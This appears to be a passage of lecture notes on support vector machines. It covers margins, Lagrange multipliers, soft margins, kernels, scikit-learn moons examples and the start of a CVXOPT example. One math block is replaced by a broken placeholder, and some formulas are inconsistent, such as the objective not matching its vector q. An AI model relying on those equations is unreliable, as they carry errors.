f(x) = \boldsymbol{w}^T\boldsymbol{x}+b = 0,
$$
as the function that determines the line $L$ that separates two classes (our two features), see the figure here.
Any point defined by $\boldsymbol{x}_i$ and $\boldsymbol{x}_2$ on the line $L$ will satisfy $\boldsymbol{w}^T(\boldsymbol{x}_1-\boldsymbol{x}_2)=0$.
The signed distance $\delta$ from any point defined by a vector $\boldsymbol{x}$ and a point $\boldsymbol{x}_0$ on the line $L$ is then
$$
\delta = \frac{1}{\vert\vert \boldsymbol{w}\vert\vert}(\boldsymbol{w}^T\boldsymbol{x}+b).
$$
How do we find the parameter $b$ and the vector $\boldsymbol{w}$? What we could
do is to define a cost function which now contains the set of all
misclassified points $M$ and attempt to minimize this function
$$
C(\boldsymbol{w},b) = -\sum_{i\in M} y_i(\boldsymbol{w}^T\boldsymbol{x}_i+b).
$$
We could now for example define all values $y_i =1$ as misclassified in case we have $\boldsymbol{w}^T\boldsymbol{x}_i+b < 0$ and the opposite if we have $y_i=-1$. Taking the derivatives gives us
$$
\frac{\partial C}{\partial b} = -\sum_{i\in M} y_i,
$$
and
$$
\frac{\partial C}{\partial \boldsymbol{w}} = -\sum_{i\in M} y_ix_i.
$$
We can now use the Newton-Raphson method or different variants of the gradient descent family (from plain gradient descent to various stochastic gradient descent approaches) to solve the equations
$$
b \leftarrow b +\eta \frac{\partial C}{\partial b},
$$
and
$$
\boldsymbol{w} \leftarrow \boldsymbol{w} +\eta \frac{\partial C}{\partial \boldsymbol{w}},
$$
where $\eta$ is our by now well-known learning rate.
The equations we discussed above can be coded rather easily (the
framework is similar to what we developed for logistic
regression). We are going to set up a simple case with two classes only and we want to find a line which separates them the best possible way.
There are however problems with this approach, although it looks
pretty straightforward to implement. When running the above code, we see that we can easily end up with many diffeent lines which separate the two classes.
For small
gaps between the entries, we may also end up needing many iterations
before the solutions converge and if the data cannot be separated
properly into two distinct classes, we may not experience a converge
at all.
## A better approach
A better approach is rather to try to define a large margin between
the two classes (if they are well separated from the beginning).
Thus, we wish to find a margin $M$ with $\boldsymbol{w}$ normalized to
$\vert\vert \boldsymbol{w}\vert\vert =1$ subject to the condition
$$
y_i(\boldsymbol{w}^T\boldsymbol{x}_i+b) \geq M \hspace{0.1cm}\forall i=1,2,\dots, p.
$$
All points are thus at a signed distance from the decision boundary defined by the line $L$. The parameters $b$ and $w_1$ and $w_2$ define this line.
We seek thus the largest value $M$ defined by
$$
\frac{1}{\vert \vert \boldsymbol{w}\vert\vert}y_i(\boldsymbol{w}^T\boldsymbol{x}_i+b) \geq M \hspace{0.1cm}\forall i=1,2,\dots, n,
$$
or just
$$
y_i(\boldsymbol{w}^T\boldsymbol{x}_i+b) \geq M\vert \vert \boldsymbol{w}\vert\vert \hspace{0.1cm}\forall i.
$$
If we scale the equation so that $\vert \vert \boldsymbol{w}\vert\vert = 1/M$, we have to find the minimum of
$\boldsymbol{w}^T\boldsymbol{w}=\vert \vert \boldsymbol{w}\vert\vert$ (the norm) subject to the condition
$$
y_i(\boldsymbol{w}^T\boldsymbol{x}_i+b) \geq 1 \hspace{0.1cm}\forall i.
$$
We have thus defined our margin as the invers of the norm of
$\boldsymbol{w}$. We want to minimize the norm in order to have a as large as
possible margin $M$. Before we proceed, we need to remind ourselves
about Lagrangian multipliers.
Consider a function of three independent variables $f(x,y,z)$ . For the function $f$ to be an
extreme we have
$$
df=0.
$$
A necessary and sufficient condition is
$$
\frac{\partial f}{\partial x} =\frac{\partial f}{\partial y}=\frac{\partial f}{\partial z}=0,
$$
due to
$$
df = \frac{\partial f}{\partial x}dx+\frac{\partial f}{\partial y}dy+\frac{\partial f}{\partial z}dz.
$$
In many problems the variables $x,y,z$ are often subject to constraints (such as those above for the margin)
so that they are no longer all independent. It is possible at least in principle to use each
constraint to eliminate one variable
and to proceed with a new and smaller set of independent varables.
The use of so-called Lagrangian multipliers is an alternative technique when the elimination
of variables is incovenient or undesirable. Assume that we have an equation of constraint on
the variables $x,y,z$
$$
\phi(x,y,z) = 0,
$$
resulting in
$$
d\phi = \frac{\partial \phi}{\partial x}dx+\frac{\partial \phi}{\partial y}dy+\frac{\partial \phi}{\partial z}dz =0.
$$
Now we cannot set anymore
$$
\frac{\partial f}{\partial x} =\frac{\partial f}{\partial y}=\frac{\partial f}{\partial z}=0,
$$
if $df=0$ is wanted
because there are now only two independent variables! Assume $x$ and $y$ are the independent
variables.
Then $dz$ is no longer arbitrary.
However, we can add to
$$
df = \frac{\partial f}{\partial x}dx+\frac{\partial f}{\partial y}dy+\frac{\partial f}{\partial z}dz,
$$
a multiplum of $d\phi$, viz. $\lambda d\phi$, resulting in
$$
df+\lambda d\phi = (\frac{\partial f}{\partial z}+\lambda
\frac{\partial \phi}{\partial x})dx+(\frac{\partial f}{\partial y}+\lambda\frac{\partial \phi}{\partial y})dy+
(\frac{\partial f}{\partial z}+\lambda\frac{\partial \phi}{\partial z})dz =0.
$$
Our multiplier is chosen so that
$$
\frac{\partial f}{\partial z}+\lambda\frac{\partial \phi}{\partial z} =0.
$$
We need to remember that we took $dx$ and $dy$ to be arbitrary and thus we must have
$$
\frac{\partial f}{\partial x}+\lambda\frac{\partial \phi}{\partial x} =0,
$$
and
$$
\frac{\partial f}{\partial y}+\lambda\frac{\partial \phi}{\partial y} =0.
$$
When all these equations are satisfied, $df=0$. We have four unknowns, $x,y,z$ and
$\lambda$. Actually we want only $x,y,z$, $\lambda$ needs not to be determined,
it is therefore often called
Lagrange's undetermined multiplier.
If we have a set of constraints $\phi_k$ we have the equations
$$
\frac{\partial f}{\partial x_i}+\sum_k\lambda_k\frac{\partial \phi_k}{\partial x_i} =0.
$$
In order to solve the above problem, we define the following Lagrangian function to be minimized
$$
{\cal L}(\lambda,b,\boldsymbol{w})=\frac{1}{2}\boldsymbol{w}^T\boldsymbol{w}-\sum_{i=1}^n\lambda_i\left[y_i(\boldsymbol{w}^T\boldsymbol{x}_i+b)-1\right],
$$
where $\lambda_i$ is a so-called Lagrange multiplier subject to the condition $\lambda_i \geq 0$.
Taking the derivatives with respect to $b$ and $\boldsymbol{w}$ we obtain
$$
\frac{\partial {\cal L}}{\partial b} = -\sum_{i} \lambda_iy_i=0,
$$
and
$$
\frac{\partial {\cal L}}{\partial \boldsymbol{w}} = 0 = \boldsymbol{w}-\sum_{i} \lambda_iy_i\boldsymbol{x}_i.
$$
Inserting these constraints into the equation for ${\cal L}$ we obtain
$$
{\cal L}=\sum_i\lambda_i-\frac{1}{2}\sum_{ij}^n\lambda_i\lambda_jy_iy_j\boldsymbol{x}_i^T\boldsymbol{x}_j,
$$
subject to the constraints $\lambda_i\geq 0$ and $\sum_i\lambda_iy_i=0$.
We must in addition satisfy the [Karush-Kuhn-Tucker](https://en.wikipedia.org/wiki/Karush%E2%80%93Kuhn%E2%80%93Tucker_conditions) (KKT) condition
$$
\lambda_i\left[y_i(\boldsymbol{w}^T\boldsymbol{x}_i+b) -1\right] \hspace{0.1cm}\forall i.
$$
1. If $\lambda_i > 0$, then $y_i(\boldsymbol{w}^T\boldsymbol{x}_i+b)=1$ and we say that $x_i$ is on the boundary.
2. If $y_i(\boldsymbol{w}^T\boldsymbol{x}_i+b)> 1$, we say $x_i$ is not on the boundary and we set $\lambda_i=0$.
When $\lambda_i > 0$, the vectors $\boldsymbol{x}_i$ are called support vectors. They are the vectors closest to the line (or hyperplane) and define the margin $M$.
We can rewrite
$$
{\cal L}=\sum_i\lambda_i-\frac{1}{2}\sum_{ij}^n\lambda_i\lambda_jy_iy_j\boldsymbol{x}_i^T\boldsymbol{x}_j,
$$
and its constraints in terms of a matrix-vector problem where we minimize w.r.t. $\lambda$ the following problem
$$
\frac{1}{2} \boldsymbol{\lambda}^T\begin{bmatrix} y_1y_1\boldsymbol{x}_1^T\boldsymbol{x}_1 & y_1y_2\boldsymbol{x}_1^T\boldsymbol{x}_2 & \dots & \dots & y_1y_n\boldsymbol{x}_1^T\boldsymbol{x}_n \\
y_2y_1\boldsymbol{x}_2^T\boldsymbol{x}_1 & y_2y_2\boldsymbol{x}_2^T\boldsymbol{x}_2 & \dots & \dots & y_1y_n\boldsymbol{x}_2^T\boldsymbol{x}_n \\
\dots & \dots & \dots & \dots & \dots \\
\dots & \dots & \dots & \dots & \dots \\
y_ny_1\boldsymbol{x}_n^T\boldsymbol{x}_1 & y_ny_2\boldsymbol{x}_n^T\boldsymbol{x}_2 & \dots & \dots & y_ny_n\boldsymbol{x}_n^T\boldsymbol{x}_n \\
\end{bmatrix}\boldsymbol{\lambda}-\mathbb{1}\boldsymbol{\lambda},
$$
subject to $\boldsymbol{y}^T\boldsymbol{\lambda}=0$. Here we defined the vectors $\boldsymbol{\lambda} =[\lambda_1,\lambda_2,\dots,\lambda_n]$ and
$\boldsymbol{y}=[y_1,y_2,\dots,y_n]$.
Solving the above problem, yields the values of $\lambda_i$.
To find the coefficients of your hyperplane we need simply to compute
$$
\boldsymbol{w}=\sum_{i} \lambda_iy_i\boldsymbol{x}_i.
$$
With our vector $\boldsymbol{w}$ we can in turn find the value of the intercept $b$ (here in two dimensions) via
$$
y_i(\boldsymbol{w}^T\boldsymbol{x}_i+b)=1,
$$
resulting in
$$
b = \frac{1}{y_i}-\boldsymbol{w}^T\boldsymbol{x}_i,
$$
or if we write it out in terms of the support vectors only, with $N_s$ being their number, we have
$$
b = \frac{1}{N_s}\sum_{j\in N_s}\left(y_j-\sum_{i=1}^n\lambda_iy_i\boldsymbol{x}_i^T\boldsymbol{x}_j\right).
$$
With our hyperplane coefficients we can use our classifier to assign any observation by simply using
$$
y_i = \mathrm{sign}(\boldsymbol{w}^T\boldsymbol{x}_i+b).
$$
Below we discuss how to find the optimal values of $\lambda_i$. Before we proceed however, we discuss now the so-called soft classifier.
## A soft classifier
Till now, the margin is strictly defined by the support vectors. This defines what is called a hard classifier, that is the margins are well defined.
Suppose now that classes overlap in feature space, as shown in the
figure here. One way to deal with this problem before we define the
so-called **kernel approach**, is to allow a kind of slack in the sense
that we allow some points to be on the wrong side of the margin.
We introduce thus the so-called **slack** variables $\boldsymbol{\xi} =[\xi_1,x_2,\dots,x_n]$ and
modify our previous equation
$$
y_i(\boldsymbol{w}^T\boldsymbol{x}_i+b)=1,
$$
to
$$
y_i(\boldsymbol{w}^T\boldsymbol{x}_i+b)=1-\xi_i,
$$
with the requirement $\xi_i\geq 0$. The total violation is now $\sum_i\xi$.
The value $\xi_i$ in the constraint the last constraint corresponds to the amount by which the prediction
$y_i(\boldsymbol{w}^T\boldsymbol{x}_i+b)=1$ is on the wrong side of its margin. Hence by bounding the sum $\sum_i \xi_i$,
we bound the total amount by which predictions fall on the wrong side of their margins.
Misclassifications occur when $\xi_i > 1$. Thus bounding the total sum by some value $C$ bounds in turn the total number of
misclassifications.
This has in turn the consequences that we change our optmization problem to finding the minimum of
$$
{\cal L}=\frac{1}{2}\boldsymbol{w}^T\boldsymbol{w}-\sum_{i=1}^n\lambda_i\left[y_i(\boldsymbol{w}^T\boldsymbol{x}_i+b)-(1-\xi_)\right]+C\sum_{i=1}^n\xi_i-\sum_{i=1}^n\gamma_i\xi_i,
$$
subject to
$$
y_i(\boldsymbol{w}^T\boldsymbol{x}_i+b)=1-\xi_i \hspace{0.1cm}\forall i,
$$
with the requirement $\xi_i\geq 0$.
Taking the derivatives with respect to $b$ and $\boldsymbol{w}$ we obtain
$$
\frac{\partial {\cal L}}{\partial b} = -\sum_{i} \lambda_iy_i=0,
$$
and
$$
\frac{\partial {\cal L}}{\partial \boldsymbol{w}} = 0 = \boldsymbol{w}-\sum_{i} \lambda_iy_i\boldsymbol{x}_i,
$$
and
$$
\lambda_i = C-\gamma_i \hspace{0.1cm}\forall i.
$$
Inserting these constraints into the equation for ${\cal L}$ we obtain the same equation as before
$$
{\cal L}=\sum_i\lambda_i-\frac{1}{2}\sum_{ij}^n\lambda_i\lambda_jy_iy_j\boldsymbol{x}_i^T\boldsymbol{x}_j,
$$
but now subject to the constraints $\lambda_i\geq 0$, $\sum_i\lambda_iy_i=0$ and $0\leq\lambda_i \leq C$.
We must in addition satisfy the Karush-Kuhn-Tucker condition which now reads
5
0
<
<
<
!
!
M
A
T
H
_
B
L
O
C
K
$$
\gamma_i\xi_i = 0,
$$
and
$$
y_i(\boldsymbol{w}^T\boldsymbol{x}_i+b) -(1-\xi_) \geq 0 \hspace{0.1cm}\forall i.
$$
## Kernels and non-linearity
The cases we have studied till now, were all characterized by two classes
with a close to linear separability. The classifiers we have described
so far find linear boundaries in our input feature space. It is
possible to make our procedure more flexible by exploring the feature
space using other basis expansions such as higher-order polynomials,
wavelets, splines etc.
If our feature space is not easy to separate, as shown in the figure
here, we can achieve a better separation by introducing more complex
basis functions. The ideal would be, as shown in the next figure, to, via a specific transformation to
obtain a separation between the classes which is almost linear.
The change of basis, from $x\rightarrow z=\phi(x)$ leads to the same type of equations to be solved, except that
we need to introduce for example a polynomial transformation to a two-dimensional training set.
import numpy as np
import os
np.random.seed(42)
# To plot pretty figures
import matplotlib
import matplotlib.pyplot as plt
plt.rcParams['axes.labelsize'] = 14
plt.rcParams['xtick.labelsize'] = 12
plt.rcParams['ytick.labelsize'] = 12
from sklearn.svm import SVC
from sklearn import datasets
X1D = np.linspace(-4, 4, 9).reshape(-1, 1)
X2D = np.c_[X1D, X1D**2]
y = np.array([0, 0, 1, 1, 1, 1, 1, 0, 0])
plt.figure(figsize=(11, 4))
plt.subplot(121)
plt.grid(True, which='both')
plt.axhline(y=0, color='k')
plt.plot(X1D[:, 0][y==0], np.zeros(4), "bs")
plt.plot(X1D[:, 0][y==1], np.zeros(5), "g^")
plt.gca().get_yaxis().set_ticks([])
plt.xlabel(r"$x_1$", fontsize=20)
plt.axis([-4.5, 4.5, -0.2, 0.2])
plt.subplot(122)
plt.grid(True, which='both')
plt.axhline(y=0, color='k')
plt.axvline(x=0, color='k')
plt.plot(X2D[:, 0][y==0], X2D[:, 1][y==0], "bs")
plt.plot(X2D[:, 0][y==1], X2D[:, 1][y==1], "g^")
plt.xlabel(r"$x_1$", fontsize=20)
plt.ylabel(r"$x_2$", fontsize=20, rotation=0)
plt.gca().get_yaxis().set_ticks([0, 4, 8, 12, 16])
plt.plot([-4.5, 4.5], [6.5, 6.5], "r--", linewidth=3)
plt.axis([-4.5, 4.5, -1, 17])
plt.subplots_adjust(right=1)
plt.show()
Suppose we define a polynomial transformation of degree two only (we continue to live in a plane with $x_i$ and $y_i$ as variables)
$$
z = \phi(x_i) =\left(x_i^2, y_i^2, \sqrt{2}x_iy_i\right).
$$
With our new basis, the equations we solved earlier are basically the same, that is we have now (without the slack option for simplicity)
$$
{\cal L}=\sum_i\lambda_i-\frac{1}{2}\sum_{ij}^n\lambda_i\lambda_jy_iy_j\boldsymbol{z}_i^T\boldsymbol{z}_j,
$$
subject to the constraints $\lambda_i\geq 0$, $\sum_i\lambda_iy_i=0$, and for the support vectors
$$
y_i(\boldsymbol{w}^T\boldsymbol{z}_i+b)= 1 \hspace{0.1cm}\forall i,
$$
from which we also find $b$.
To compute $\boldsymbol{z}_i^T\boldsymbol{z}_j$ we define the kernel $K(\boldsymbol{x}_i,\boldsymbol{x}_j)$ as
$$
K(\boldsymbol{x}_i,\boldsymbol{x}_j)=\boldsymbol{z}_i^T\boldsymbol{z}_j= \phi(\boldsymbol{x}_i)^T\phi(\boldsymbol{x}_j).
$$
For the above example, the kernel reads
$$
K(\boldsymbol{x}_i,\boldsymbol{x}_j)=[x_i^2, y_i^2, \sqrt{2}x_iy_i]^T\begin{bmatrix} x_j^2 \\ y_j^2 \\ \sqrt{2}x_jy_j \end{bmatrix}=x_i^2x_j^2+2x_ix_jy_iy_j+y_i^2y_j^2.
$$
We note that this is nothing but the dot product of the two original
vectors $(\boldsymbol{x}_i^T\boldsymbol{x}_j)^2$. Instead of thus computing the
product in the Lagrangian of $\boldsymbol{z}_i^T\boldsymbol{z}_j$ we simply compute
the dot product $(\boldsymbol{x}_i^T\boldsymbol{x}_j)^2$.
This leads to the so-called
kernel trick and the result leads to the same as if we went through
the trouble of performing the transformation
$\phi(\boldsymbol{x}_i)^T\phi(\boldsymbol{x}_j)$ during the SVM calculations.
Using our definition of the kernel We can rewrite again the Lagrangian
$$
{\cal L}=\sum_i\lambda_i-\frac{1}{2}\sum_{ij}^n\lambda_i\lambda_jy_iy_j\boldsymbol{x}_i^T\boldsymbol{z}_j,
$$
subject to the constraints $\lambda_i\geq 0$, $\sum_i\lambda_iy_i=0$ in terms of a convex optimization problem
$$
\frac{1}{2} \boldsymbol{\lambda}^T\begin{bmatrix} y_1y_1K(\boldsymbol{x}_1,\boldsymbol{x}_1) & y_1y_2K(\boldsymbol{x}_1,\boldsymbol{x}_2) & \dots & \dots & y_1y_nK(\boldsymbol{x}_1,\boldsymbol{x}_n) \\
y_2y_1K(\boldsymbol{x}_2,\boldsymbol{x}_1) & y_2y_2(\boldsymbol{x}_2,\boldsymbol{x}_2) & \dots & \dots & y_1y_nK(\boldsymbol{x}_2,\boldsymbol{x}_n) \\
\dots & \dots & \dots & \dots & \dots \\
\dots & \dots & \dots & \dots & \dots \\
y_ny_1K(\boldsymbol{x}_n,\boldsymbol{x}_1) & y_ny_2K(\boldsymbol{x}_n\boldsymbol{x}_2) & \dots & \dots & y_ny_nK(\boldsymbol{x}_n,\boldsymbol{x}_n) \\
\end{bmatrix}\boldsymbol{\lambda}-\mathbb{1}\boldsymbol{\lambda},
$$
subject to $\boldsymbol{y}^T\boldsymbol{\lambda}=0$. Here we defined the vectors $\boldsymbol{\lambda} =[\lambda_1,\lambda_2,\dots,\lambda_n]$ and
$\boldsymbol{y}=[y_1,y_2,\dots,y_n]$.
If we add the slack constants this leads to the additional constraint $0\leq \lambda_i \leq C$.
We can rewrite this (see the solutions below) in terms of a convex optimization problem of the type
$$
\begin{align*}
&\mathrm{min}_{\lambda}\hspace{0.2cm} \frac{1}{2}\boldsymbol{\lambda}^T\boldsymbol{P}\boldsymbol{\lambda}+\boldsymbol{q}^T\boldsymbol{\lambda},\\ \nonumber
&\mathrm{subject\hspace{0.1cm}to} \hspace{0.2cm} \boldsymbol{G}\boldsymbol{\lambda} \preceq \boldsymbol{h} \hspace{0.2cm} \wedge \boldsymbol{A}\boldsymbol{\lambda}=f.
\end{align*}
$$
Below we discuss how to solve these equations. Here we note that the matrix $\boldsymbol{P}$ has matrix elements $p_{ij}=y_iy_jK(\boldsymbol{x}_i,\boldsymbol{x}_j)$.
Given a kernel $K$ and the targets $y_i$ this matrix is easy to set up. The constraint $\boldsymbol{y}^T\boldsymbol{\lambda}=0$ leads to $f=0$ and $\boldsymbol{A}=\boldsymbol{y}$. How to set up the matrix $\boldsymbol{G}$ is discussed later. Here note that the inequalities $0\leq \lambda_i \leq C$ can be split up into
$0\leq \lambda_i$ and $\lambda_i \leq C$. These two inequalities define then the matrix $\boldsymbol{G}$ and the vector $\boldsymbol{h}$.
## Different kernels and Mercer's theorem
There are several popular kernels being used. These are
1. Linear: $K(\boldsymbol{x},\boldsymbol{y})=\boldsymbol{x}^T\boldsymbol{y}$,
2. Polynomial: $K(\boldsymbol{x},\boldsymbol{y})=(\boldsymbol{x}^T\boldsymbol{y}+\gamma)^d$,
3. Gaussian Radial Basis Function: $K(\boldsymbol{x},\boldsymbol{y})=\exp{\left(-\gamma\vert\vert\boldsymbol{x}-\boldsymbol{y}\vert\vert^2\right)}$,
4. Tanh: $K(\boldsymbol{x},\boldsymbol{y})=\tanh{(\boldsymbol{x}^T\boldsymbol{y}+\gamma)}$,
and many other ones.
An important theorem for us is [Mercer's
theorem](https://en.wikipedia.org/wiki/Mercer%27s_theorem). The
theorem states that if a kernel function $K$ is symmetric, continuous
and leads to a positive semi-definite matrix $\boldsymbol{P}$ then there
exists a function $\phi$ that maps $\boldsymbol{x}_i$ and $\boldsymbol{x}_j$ into
another space (possibly with much higher dimensions) such that
$$
K(\boldsymbol{x}_i,\boldsymbol{x}_j)=\phi(\boldsymbol{x}_i)^T\phi(\boldsymbol{x}_j).
$$
So you can use $K$ as a kernel since you know $\phi$ exists, even if
you don’t know what $\phi$ is.
Note that some frequently used kernels (such as the Sigmoid kernel)
don’t respect all of Mercer’s conditions, yet they generally work well
in practice.
## The moons example
from __future__ import division, print_function, unicode_literals
import numpy as np
np.random.seed(42)
import matplotlib
import matplotlib.pyplot as plt
plt.rcParams['axes.labelsize'] = 14
plt.rcParams['xtick.labelsize'] = 12
plt.rcParams['ytick.labelsize'] = 12
from sklearn.svm import SVC
from sklearn import datasets
from sklearn.pipeline import Pipeline
from sklearn.preprocessing import StandardScaler
from sklearn.svm import LinearSVC
from sklearn.datasets import make_moons
X, y = make_moons(n_samples=100, noise=0.15, random_state=42)
def plot_dataset(X, y, axes):
plt.plot(X[:, 0][y==0], X[:, 1][y==0], "bs")
plt.plot(X[:, 0][y==1], X[:, 1][y==1], "g^")
plt.axis(axes)
plt.grid(True, which='both')
plt.xlabel(r"$x_1$", fontsize=20)
plt.ylabel(r"$x_2$", fontsize=20, rotation=0)
plot_dataset(X, y, [-1.5, 2.5, -1, 1.5])
plt.show()
from sklearn.datasets import make_moons
from sklearn.pipeline import Pipeline
from sklearn.preprocessing import PolynomialFeatures
polynomial_svm_clf = Pipeline([
("poly_features", PolynomialFeatures(degree=3)),
("scaler", StandardScaler()),
("svm_clf", LinearSVC(C=10, loss="hinge", random_state=42))
])
polynomial_svm_clf.fit(X, y)
def plot_predictions(clf, axes):
x0s = np.linspace(axes[0], axes[1], 100)
x1s = np.linspace(axes[2], axes[3], 100)
x0, x1 = np.meshgrid(x0s, x1s)
X = np.c_[x0.ravel(), x1.ravel()]
y_pred = clf.predict(X).reshape(x0.shape)
y_decision = clf.decision_function(X).reshape(x0.shape)
plt.contourf(x0, x1, y_pred, cmap=plt.cm.brg, alpha=0.2)
plt.contourf(x0, x1, y_decision, cmap=plt.cm.brg, alpha=0.1)
plot_predictions(polynomial_svm_clf, [-1.5, 2.5, -1, 1.5])
plot_dataset(X, y, [-1.5, 2.5, -1, 1.5])
plt.show()
from sklearn.svm import SVC
poly_kernel_svm_clf = Pipeline([
("scaler", StandardScaler()),
("svm_clf", SVC(kernel="poly", degree=3, coef0=1, C=5))
])
poly_kernel_svm_clf.fit(X, y)
poly100_kernel_svm_clf = Pipeline([
("scaler", StandardScaler()),
("svm_clf", SVC(kernel="poly", degree=10, coef0=100, C=5))
])
poly100_kernel_svm_clf.fit(X, y)
plt.figure(figsize=(11, 4))
plt.subplot(121)
plot_predictions(poly_kernel_svm_clf, [-1.5, 2.5, -1, 1.5])
plot_dataset(X, y, [-1.5, 2.5, -1, 1.5])
plt.title(r"$d=3, r=1, C=5$", fontsize=18)
plt.subplot(122)
plot_predictions(poly100_kernel_svm_clf, [-1.5, 2.5, -1, 1.5])
plot_dataset(X, y, [-1.5, 2.5, -1, 1.5])
plt.title(r"$d=10, r=100, C=5$", fontsize=18)
plt.show()
def gaussian_rbf(x, landmark, gamma):
return np.exp(-gamma * np.linalg.norm(x - landmark, axis=1)**2)
gamma = 0.3
x1s = np.linspace(-4.5, 4.5, 200).reshape(-1, 1)
x2s = gaussian_rbf(x1s, -2, gamma)
x3s = gaussian_rbf(x1s, 1, gamma)
XK = np.c_[gaussian_rbf(X1D, -2, gamma), gaussian_rbf(X1D, 1, gamma)]
yk = np.array([0, 0, 1, 1, 1, 1, 1, 0, 0])
plt.figure(figsize=(11, 4))
plt.subplot(121)
plt.grid(True, which='both')
plt.axhline(y=0, color='k')
plt.scatter(x=[-2, 1], y=[0, 0], s=150, alpha=0.5, c="red")
plt.plot(X1D[:, 0][yk==0], np.zeros(4), "bs")
plt.plot(X1D[:, 0][yk==1], np.zeros(5), "g^")
plt.plot(x1s, x2s, "g--")
plt.plot(x1s, x3s, "b:")
plt.gca().get_yaxis().set_ticks([0, 0.25, 0.5, 0.75, 1])
plt.xlabel(r"$x_1$", fontsize=20)
plt.ylabel(r"Similarity", fontsize=14)
plt.annotate(r'$\mathbf{x}$',
xy=(X1D[3, 0], 0),
xytext=(-0.5, 0.20),
ha="center",
arrowprops=dict(facecolor='black', shrink=0.1),
fontsize=18,
)
plt.text(-2, 0.9, "$x_2$", ha="center", fontsize=20)
plt.text(1, 0.9, "$x_3$", ha="center", fontsize=20)
plt.axis([-4.5, 4.5, -0.1, 1.1])
plt.subplot(122)
plt.grid(True, which='both')
plt.axhline(y=0, color='k')
plt.axvline(x=0, color='k')
plt.plot(XK[:, 0][yk==0], XK[:, 1][yk==0], "bs")
plt.plot(XK[:, 0][yk==1], XK[:, 1][yk==1], "g^")
plt.xlabel(r"$x_2$", fontsize=20)
plt.ylabel(r"$x_3$ ", fontsize=20, rotation=0)
plt.annotate(r'$\phi\left(\mathbf{x}\right)$',
xy=(XK[3, 0], XK[3, 1]),
xytext=(0.65, 0.50),
ha="center",
arrowprops=dict(facecolor='black', shrink=0.1),
fontsize=18,
)
plt.plot([-0.1, 1.1], [0.57, -0.1], "r--", linewidth=3)
plt.axis([-0.1, 1.1, -0.1, 1.1])
plt.subplots_adjust(right=1)
plt.show()
x1_example = X1D[3, 0]
for landmark in (-2, 1):
k = gaussian_rbf(np.array([[x1_example]]), np.array([[landmark]]), gamma)
print("Phi({}, {}) = {}".format(x1_example, landmark, k))
rbf_kernel_svm_clf = Pipeline([
("scaler", StandardScaler()),
("svm_clf", SVC(kernel="rbf", gamma=5, C=0.001))
])
rbf_kernel_svm_clf.fit(X, y)
from sklearn.svm import SVC
gamma1, gamma2 = 0.1, 5
C1, C2 = 0.001, 1000
hyperparams = (gamma1, C1), (gamma1, C2), (gamma2, C1), (gamma2, C2)
svm_clfs = []
for gamma, C in hyperparams:
rbf_kernel_svm_clf = Pipeline([
("scaler", StandardScaler()),
("svm_clf", SVC(kernel="rbf", gamma=gamma, C=C))
])
rbf_kernel_svm_clf.fit(X, y)
svm_clfs.append(rbf_kernel_svm_clf)
plt.figure(figsize=(11, 7))
for i, svm_clf in enumerate(svm_clfs):
plt.subplot(221 + i)
plot_predictions(svm_clf, [-1.5, 2.5, -1, 1.5])
plot_dataset(X, y, [-1.5, 2.5, -1, 1.5])
gamma, C = hyperparams[i]
plt.title(r"$\gamma = {}, C = {}$".format(gamma, C), fontsize=16)
plt.show()
## Mathematical optimization of convex functions
A mathematical (quadratic) optimization problem, or just optimization problem, has the form
$$
\begin{align*}
&\mathrm{min}_{\lambda}\hspace{0.2cm} \frac{1}{2}\boldsymbol{\lambda}^T\boldsymbol{P}\boldsymbol{\lambda}+\boldsymbol{q}^T\boldsymbol{\lambda},\\ \nonumber
&\mathrm{subject\hspace{0.1cm}to} \hspace{0.2cm} \boldsymbol{G}\boldsymbol{\lambda} \preceq \boldsymbol{h} \wedge \boldsymbol{A}\boldsymbol{\lambda}=f.
\end{align*}
$$
subject to some constraints for say a selected set $i=1,2,\dots, n$.
In our case we are optimizing with respect to the Lagrangian multipliers $\lambda_i$, and the
vector $\boldsymbol{\lambda}=[\lambda_1, \lambda_2,\dots, \lambda_n]$ is the optimization variable we are dealing with.
In our case we are particularly interested in a class of optimization problems called convex optmization problems.
In our discussion on gradient descent methods we discussed at length the definition of a convex function.
Convex optimization problems play a central role in applied mathematics and we recommend strongly [Boyd and Vandenberghe's text on the topics](http://web.stanford.edu/~boyd/cvxbook/).
If we use Python as programming language and wish to venture beyond
**scikit-learn**, **tensorflow** and similar software which makes our
lives so much easier, we need to dive into the wonderful world of
quadratic programming. We can, if we wish, solve the minimization
problem using say standard gradient methods or conjugate gradient
methods. However, these methods tend to exhibit a rather slow
converge. So, welcome to the promised land of quadratic programming.
The functions we need are contained in the quadratic programming package **CVXOPT** and we need to import it together with **numpy** as
import numpy
import cvxopt
This will make our life much easier. You don't need t write your own optimizer.
We remind ourselves about the general problem we want to solve
$$
\begin{align*}
&\mathrm{min}_{x}\hspace{0.2cm} \frac{1}{2}\boldsymbol{x}^T\boldsymbol{P}\boldsymbol{x}+\boldsymbol{q}^T\boldsymbol{x},\\ \nonumber
&\mathrm{subject\hspace{0.1cm} to} \hspace{0.2cm} \boldsymbol{G}\boldsymbol{x} \preceq \boldsymbol{h} \wedge \boldsymbol{A}\boldsymbol{x}=f.
\end{align*}
$$
Let us show how to perform the optmization using a simple case. Assume we want to optimize the following problem
$$
\begin{align*}
&\mathrm{min}_{x}\hspace{0.2cm} \frac{1}{2}x^2+5x+3y \\ \nonumber
&\mathrm{subject to} \\ \nonumber
&x, y \geq 0 \\ \nonumber
&x+3y \geq 15 \\ \nonumber
&2x+5y \leq 100 \\ \nonumber
&3x+4y \leq 80. \\ \nonumber
\end{align*}
$$
The minimization problem can be rewritten in terms of vectors and matrices as (with $x$ and $y$ being the unknowns)
$$
\frac{1}{2}\begin{bmatrix} x\\ y \end{bmatrix}^T \begin{bmatrix} 1 & 0\\ 0 & 0 \end{bmatrix} \begin{bmatrix} x \\ y \end{bmatrix} + \begin{bmatrix}3\\ 4 \end{bmatrix}^T \begin{bmatrix}x \\ y \end{bmatrix}.
$$
Similarly, we can now set up the inequalities (we need to change $\geq$ to $\leq$ by multiplying with $-1$ on bot sides) as the following matrix-vector equation
$$
\begin{bmatrix} -1 & 0 \\ 0 & -1 \\ -1 & -3 \\ 2 & 5 \\ 3 & 4\end{bmatrix}\begin{bmatrix} x \\ y\end{bmatrix} \preceq \begin{bmatrix}0 \\ 0\\ -15 \\ 100 \\ 80\end{bmatrix}.
$$
We have collapsed all the inequalities into a single matrix $\boldsymbol{G}$. We see also that our matrix
$$
\boldsymbol{P} =\begin{bmatrix} 1 & 0\\ 0 & 0 \end{bmatrix}
$$
is clearly positive semi-definite (all eigenvalues larger or equal zero).
Finally, the vector $\boldsymbol{h}$ is defined as
$$
